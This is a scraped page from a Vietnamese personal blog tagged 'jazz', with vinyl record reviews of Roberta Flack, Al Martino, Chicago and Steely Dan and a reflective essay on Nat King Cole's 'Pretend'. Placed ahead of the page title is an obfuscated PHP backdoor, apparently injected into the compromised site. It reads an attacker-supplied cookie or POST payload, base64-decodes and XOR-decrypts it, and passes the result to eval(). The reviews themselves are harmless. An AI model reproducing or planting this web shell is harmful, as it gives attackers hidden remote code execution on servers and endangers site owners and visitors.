$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> jazz – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Tag: jazz

Roberta Flack ‎– Feel Like Makin’ Love

Album này mua nhân một buổi chán quá đi dạo tiệm đĩa, thấy tựa đề hay nên vác về đại, hoàn toàn chưa biết đến Roberta Flack là ai. Ban đầu khi cho đĩa vào turntable, hình dung trong đầu mình (từ tựa đề và bìa album) là một album nhạc pop folk nhẹ nhàng nào đó, tới khi những nốt nhạc đầu tiên vang lên thì không phải.

Roberta Flack là một ca sĩ nhạc jazz, R&B và soul nổi tiếng những năm 70, và tuy album Feel Like Makin’ Love không phải là album hay và có tiếng vang nhất của bà, nó cũng là một album được đánh giá cao.

Ngoài ca khúc cũng là tựa đề album – vốn, không nghi ngờ gì, cũng nằm trong danh sách những bài hát của nhiều người, thì Early Ev’ry Midnight, Mr Magic, Some Gospel according to Mathew hay I can see the Sun in Late December của Stevie Wonder cũng đều có những điểm nhấn và sắc thái riêng. Album mang đầy đủ đặc trưng của những ca khúc jazz, soul, nghe rất thanh tịnh, thoải mái và bình yên. Nghe album này đẹp nhất là lúc nửa đêm, trong ánh đèn ngủ chập chờn hé, và tiếng hát của người ca sĩ vang lên

Ooh that’s the time, I feel like makin’ love to you
That’s the time, I feel like makin’ dreams come true
Oh baby

Cảm giác âm nhạc thật đẹp biết bao 🙂

Al Martino – Daddy’s Little Girl

Al Martino là một ca sĩ khá có tiếng trong những năm 50, 60. Tuy nhiên, ông được biết đến nhiều hơn qua vai diễn Johnny Fontane trong bộ phim Bố Già kinh điển. Ông cũng là một trong những nam ca sĩ thành công nhất trong cộng đồng người Mỹ gốc Ý.

Record này mình mua chỉ bởi vì cái tên: Daddy’s Little Girl. Và quả thật nó không làm mình thất vọng. Bài hát chính cùng tên của album nghe rất cảm động, thấm đẫm tình cha con. Các bài hát khác trong album cũng là những bài pop hết sức dễ nghe. Nhìn chung, Daddy’s Little Girl có chất nhạc rất đặc trưng của những album thập niên 60, khi mà các bài hát với lời cực kì lãng mạn được cất lên trên nền nhạc chậm rãi mang âm hưởng của jazz.

Những record như thế này rất hợp để nghe sau một ngày làm việc uể oải và mệt nhọc. Cảm giác thư thái nó mang lại khiến mình khá thích. 4/5 cho record này.

Chicago – Chicago II

Record đầu tiên của Chicago – một trong những rock ban tồn tại lâu và thành công nhất mà mình có. Mình nhớ đợt đó mình thấy 2 records của Chicago tại thrift store, tình trạng còn khá tốt, ngẩn người ra một hồi vẫn chẳng nhớ mình từng nghe đến Chicago ở đâu, chỉ có ấn tượng mơ hồ rằng đây là ban nhạc chất lượng và đáng đồng tiền bát gạo. Thế là mua thôi. Tới giờ mới có dịp lôi Chicago ra nghe, mở màn bằng record Chicago II này.

Chicago II có 2 đĩa (4 mặt) khiến mình khá bất ngờ, vì thường studio album ít ai chơi nhiều đến thế, đặc biệt toàn những bài phối khí và chơi nhạc ngon lành. Trước khi bắt đầu nghe Chicago, mình có kì vọng nhạc của họ sẽ hợp gout với mình. Đúng là thế. Cái thứ nhạc đầy ngẫu hứng kết hợp pop rock, jazz và progressive rock ấy khiến mình trầm trồ mãi thôi.

Ngay từ bài mở màn Movin’ In mình đã ngất ngây với tiếng piano hoà cùng giọng ca sĩ rất mộc, xen lẫn ở đó là những đoạn solo kèn bay bổng. Và cứ thế, xuyên suốt album là tiếng kèn jazz hoà với guitar điện tử, piano mộc mạc, tiếng sáo, flute và bộ gõ… cứ như một dàn nhạc giao hưởng đang đánh, làm đầu người nghe cứ phải lắc lư phiêu du mãi. Điểm đặc biệt là các bài đều hoàn hảo và chín tới như nhau, mỗi bài như một trường đoạn tấu nhạc hoà quyện, nghe cảm xúc cứ hoà quyện loại thành một mạch.

Hoàn toàn là ấn tượng rất tốt cho record mình nghe đầu tiên của một ban nhạc sừng sỏ thế này. Chuẩn bị chơi tiếp record còn lại mà mình có của Chicago thôi.

 

Steely Dan – Aja

Aja là một album khá lạ, theo ý mình. Nó được rất nhiều những dân nghe nhạc chuyên nghiệp hay những tay phối khí, những nghệ sĩ lớn xem là một trong, nếu không muốn nói, album hay nhất từng được thu âm. Aja của Steely Dan được thu âm đã gần 40 năm nhưng chất lượng của nó tuyệt vời đến mức cho đến giờ cũng hiếm record nào đạt tới được. Âm thanh nó hay tuyệt diệu và rất chuẩn. Nếu được hỏi record nào nên dùng để test xem một hệ thống chơi vinyl có ngon lành không, người ta đa phần hay khuyên: hãy bỏ Aja vào. Thế nhưng, với đông đảo thính giả nghe nhạc, Aja không phải là một cái tên thuộc dạng khá phổ thông, đại chúng.

Vào cái mùa hè Summer of Hate năm 1977 nổi tiếng đó, không phải God Save The Queen của Sex Pistols, cũng không phải The Clash với album cùng tên của mình là điểm nóng nhất, mà là Aja của Steely Dan – một album hoàn toàn không dính gì tới phong trào punk đầy nổi loạn và gây tranh cãi kéo dài. Phải chăng vì thế mà sau này, Rolling Stones đã gọi họ là “kẻ phản-diện hoàn hảo nhất trong âm nhạc những năm 70”.

Aja thuộc thể loại jazz rock. Và đây cũng là record đầu tiên mình nghe kết hợp jazz vào với rock. Trong album này, Donald Fagen và Walter Becker mời cộng tác những tên tuổi thuộc loại nổi tiếng nhất trong loại nhạc jazz/R&B những năm 70: tay trống Steve Gadd (một trong những tay trống được đánh giá cao nhất về chuyên môn) và Bernard Perdie (Purdie Shuffle nổi tiếng), tay bass Chuck Rainey, vocal Michael McDonald (của The Doobie Brothers), đặc biệt là tay saxophone huyền thoại, người sau này thắng tới 10 giải Grammy là Wayne Shorter. Với “đội hình” đẹp như thế, không khó hiểu khi trong album có những đoạn solo ngẫu hứng đẹp đến rụng rời.

Nhìn chung, Aja theo mình thấy xứng với những gì mà những nhà phê bình, dù là khó tính nhất khen ngợi. Cái thể loại jazz-rock đầy ngẫu hứng đi kèm lyrics cũng tự nhiên và lạ không kém khiến mình thổn thức không thôi. Đây là một trong những record hiếm hoi mà mới nghe lần đầu mình đã hứng thú đến mức chơi đi chơi lại liên tục. Track mình thích nhất trong album chắc là Aja, nhất là đoạn thổi saxophone lả lơi mà dịu dàng đầm ấm, nghe vào cứ như thấy mình đang bay bổng, phiêu du.

Highly recommended!

Pretend you’re happy when you’re blue

Nat King Cole

Link bài hát: Nat King Cole – Pretend

Lyrics bài hát: Nat King Cole – Pretend

Tin anh đi. Trong quá khứ anh chưa từng thích nghe và hầu như chưa từng nghe một bài nhạc Jazz nào. Và anh cũng quyết định là sẽ chẳng bao giờ anh để ra, dù chỉ là một phần nhỏ nhất, dung lượng ổ cứng để chứa thứ nhạc khó nghe này.

Mọi sự thay đổi cho tới khi cái loa máy tính (đã xài 7 năm) của anh bị hư. Anh chẳng biết lão già nào phát minh ra cái tai nghe nhỏ nhỏ, nhưng mà anh cám ơn, từ tận đáy lòng. Nhờ nó mà anh có thể nghe nhạc. Dĩ nhiên, anh chẳng muốn bị điếc vì nghe Rock bằng tai nghe, phỏng ạ. Tộ sư mười mấy đời nhà nó, Rock trong máy anh đa phần không Heavy, Thrash Metal thì là Death, Black. Thế mới chết.

Vì vậy, anh – với mong muốn bảo quản đến độ kĩ càng nhất sản phẩm ưu việt của Thượng đế (là chính anh), đành phải tìm một loại nhạc nhẹ để nghe. Anh đã vào tuổi tiền-mãn-teen rồi, nên dĩ nhiên không nghe teen-pop.

Thế nên, anh chọn nghe Jazz. Đơn giản thế thôi.

Mới bắt đầu nghe Jazz, lại thiếu một bàn tay mềm mại và một giọng nói dịu êm kề bên tai dẫn dắt, giữa cái mê hồn trận này, con cừu bơ vơ đáng thương như anh chỉ có cách hỏi thằng bạn già Google. Hối lộ nó một hồi, nó chỉ tới chỉ lui một hồi, anh nhắm mắt phó mặc cuộc đời anh cho cái tên Nat King Cole.

Thế là anh có một loạt bài hát của Nat King Cole. Còn gái nào định hỏi làm sao mà có được, thì bỏ thời gian đó về vòi mẹ mua muối Iốt cho mà ăn nhé.

Trong danh sách các bài hát ấy, bài anh để ý nhất là bài Pretend. Chỉ bởi vì nó là điệu nhạc buồn, xuyên suốt qua từng trang, từng chữ trong tác phẩm Phía Nam biên giới, phía Tây mặt trời của Haruki Murakami ((http://vi.wikipedia.org/wiki/Haruki_Murakami)). Mặc dù anh không thích truyện Nhật, nhưng anh vẫn đọc kha khá tác phẩm của ông. Truyện này ngắn hơn, và dễ đọc so với Rừng NaUy hay Biên niên kí chim vặn dây cót nhiều. Nó hiện thực hơn, nhưng không thiếu những phút ngẫu hứng, rất nhỏ, rất nhẹ, tựa như một bản nhạc jazz êm dịu được tấu lên trong lúc con người đang ngà ngà say với một loại cocktail nào đó.

Phía Nam biên giới, phía Tây mặt trời

Bài Pretend này cũng thế.

Anh không uống rượu, chính xác hơn là không thích uống rượu, nhưng không phải là chưa từng uống. Cái cảm giác của anh lúc này giống như cảm giác của anh lúc ấy, khi đầu anh quay cuồng giữa tiếng nhạc chát chúa, tiếng guitar cọc cằn, tiếng trống dồn dập, tiếng gào đầy dữ tợn, thê lương của Death, hay gục xuống cắn răng thật chặt lúc giai điệu của bài The Sound Of Silence ((Phiên bản anh nghe có lẽ là của Atrocity http://www.youtube.com/watch?v=gwNdq4AC6qY)) vang lên.

Hiện giờ cũng thế. Không cần rock, không cần rượu. Chỉ cần những giai điệu đó thôi, là đủ khơi lại tất cả cảm giác ấy.

Cái cảm giác như thoát được ra tất cả. Không còn nỗi đau, không còn thực tại, không còn cả chính mình.
Và sau đó, là cái cảm giác thinh lặng đến nghẹn ngào khi nhận ra thực tại.
Hai cảm giác đó không bao giờ tách biệt nhau, mà song hành cùng nhau, cảm giác trên càng mạnh, thì kéo theo cảm giác dưới càng đau.

Đm, xin lỗi vì anh chửi thề, nhưng nghe bài này cũng thế.

Nhạc và lời càng chậm, từng lời, từng nốt, nó càng ma quái, càng cuốn ta ra khỏi thực tại, thì khi tỉnh, lại càng đau…

Thoáng hiện em về trong đáy cốc
Nói cười như chuyện một đêm mơ…
((Đôi bờ – Quang Dũng))

Một đêm mơ, ha ha…

B.l.u.e.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.